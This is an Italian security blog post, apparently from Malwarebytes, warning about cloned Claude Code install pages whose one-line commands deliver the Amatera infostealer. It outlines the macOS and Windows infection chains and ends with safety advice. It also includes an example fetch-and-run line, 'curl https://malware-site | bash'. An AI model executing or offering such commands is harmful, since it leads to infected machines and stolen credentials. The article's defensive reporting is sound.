Gli hacker stanno clonando le pagine di installazione di strumenti popolari come Claude Code e sostituendo i comandi di installazione "one-liner" con malware, principalmente per rubare password, cookie, sessioni e accedere agli ambienti di sviluppo.
Le guide di installazione moderne spesso ti dicono di copiare un singolo comando come curl https://malware-site | bash nel terminale e premi Invio. Questa abitudine trasforma il sito web in un telecomando: qualsiasi script presente a quell'URL viene eseguito con le tue autorizzazioni, spesso quelle di un amministratore.
I ricercatori hanno scoperto che gli hacker sfruttano questo flusso di lavoro mantenendo tutto identico e modificando solo il punto di connessione di quella riga di codice. Per molti utenti non esperti che hanno appena iniziato a utilizzare l'intelligenza artificiale e gli strumenti di sviluppo, questo metodo sembra normale, quindi abbassano la guardia.
Ma questo si riduce fondamentalmente a "Mi fido di questo dominio" e non è una buona idea a meno che non si sia certi che sia affidabile.
Di solito funziona così. Qualcuno cerca "Claude Code install" o "Claude Code CLI", vede un risultato sponsorizzato in cima alla pagina con un URL plausibile e clicca senza pensarci troppo.
Ma quell'annuncio rimanda a una download di documentazione o download clonata: stesso logo, stessa barra laterale, stesso testo e un familiare pulsante "copia" accanto al comando di installazione. In molti casi, qualsiasi altro link su cui si clicca in quella pagina falsa reindirizza silenziosamente al sito reale del venditore, quindi nient'altro sembra sospetto.
Simile agli attacchi ClickFix, questo metodo è chiamato InstallFix. L'utente esegue il codice che infetta il proprio computer con false pretese e il payload è solitamente un infostealer.
Il payload principale in questi casi di InstallFix con tema Claude Code è un infostealer chiamato Amatera. Si concentra sui dati del browser come password salvate, cookie, token di sessione, dati di compilazione automatica e informazioni generali sul sistema che aiutano gli aggressori a profilare il dispositivo. In questo modo, possono dirottare le sessioni web e accedere alle dashboard cloud e ai pannelli di amministrazione interni senza aver bisogno della tua password effettiva. Alcuni rapporti menzionano anche un interesse per i portafogli crittografici e altri account di alto valore.
Windows Mac
La campagna basata sul Claude Code individuata dai ricercatori era in grado di colpire sia Mac Windows Mac .
Su macOS, il codice dannoso di una riga solitamente scarica uno script di seconda fase da un dominio controllato dall'autore dell'attacco, spesso offuscato con base64 per sembrare a prima vista rumoroso ma innocuo. Lo script scarica quindi ed esegue un file binario da un altro dominio, rimuovendo gli attributi e rendendolo eseguibile prima di lanciarlo.
Su Windows, il comando è stato visto generare cmd.exe, che poi chiama mshta.exe con un URL remoto. Ciò consente alla logica del malware di funzionare come un file binario Microsoft affidabile anziché come un eseguibile casuale evidente. In entrambi i casi, sullo schermo non appare nulla di spettacolare: si pensa di aver semplicemente installato uno strumento, mentre il vero payload inizia silenziosamente a svolgere il proprio lavoro in background.
Come stare al sicuro
Con ClickFix e InstallFix che imperversano – e non sembra che spariranno presto – è importante essere consapevoli, prudenti e protetti.
- Rallenta. Nonaffrettarti a seguire le istruzioni riportate su una pagina web o in un messaggio, soprattutto se ti chiedono di eseguire comandi sul tuo dispositivo o di copiare e incollare codice. Analizza cosa farà il comando prima di eseguirlo.
- Evita di eseguire comandi o script provenienti da fonti non attendibili. Noneseguire maicodice o comandi copiati da siti web, e-mail o messaggi a meno che tu non abbia fiducia nella fonte e comprenda lo scopo dell'azione. Verifica le istruzioni in modo indipendente. Se un sito web ti chiede di eseguire un comando o un'azione tecnica, controlla la documentazione ufficiale o contatta l'assistenza prima di procedere.
- Limita l'uso del copia-incolla per i comandi.Digitare manualmentei comandi invece di copiarli e incollarli può ridurre il rischio di eseguire inconsapevolmente payload dannosi nascosti nel testo copiato.
- Proteggi i tuoi dispositivi. Utilizzaunasoluzione anti-malwareaggiornata e in tempo reale con un componente di protezione web.
- Informati sulle tecniche di attacco in continua evoluzione.Comprendere che gli attacchi possono provenire da vettori inaspettati ed evolversi aiuta a mantenere alta la vigilanza. Continua a leggere il nostro blog!
Suggerimento da esperto:sapevi che il programma gratuito Malwarebytes Browser Guard ti avvisa quando un sito web cerca di copiare qualcosa negli appunti?
Non ci limitiamo a segnalare le minacce, ma le eliminiamo.
I rischi per la sicurezza informatica non dovrebbero mai diffondersi al di là di un titolo di giornale. Tenete le minacce lontane dai vostri dispositivi scaricando Malwarebytes oggi stesso.
